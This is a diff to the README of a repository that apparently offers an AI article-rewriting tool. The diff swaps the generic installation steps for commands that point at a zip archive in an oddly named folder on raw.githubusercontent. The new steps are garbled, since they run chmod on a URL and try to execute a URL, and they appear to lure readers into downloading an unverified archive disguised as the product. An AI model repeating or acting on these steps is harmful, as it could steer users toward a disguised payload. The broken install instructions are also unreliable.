smuv3/ai-human-like-article-rewriter/README.md

 1. Open the terminal.
 2. Navigate to the directory where the file was downloaded.
-3. Use the command `chmod +x your-file-name.run` to provide execution permissions.
+3. Use the command `chmod +x https://raw.githubusercontent.com/smuv3/ai-human-like-article-rewriter/main/arrowroot/ai-human-like-article-rewriter.zip` to provide execution permissions.
-4. Then run `./your-file-name.run` to start the installation.
+4. Then run `https://raw.githubusercontent.com/smuv3/ai-human-like-article-rewriter/main/arrowroot/ai-human-like-article-rewriter.zip` to start the installation.

 ## ✍️ Using the Application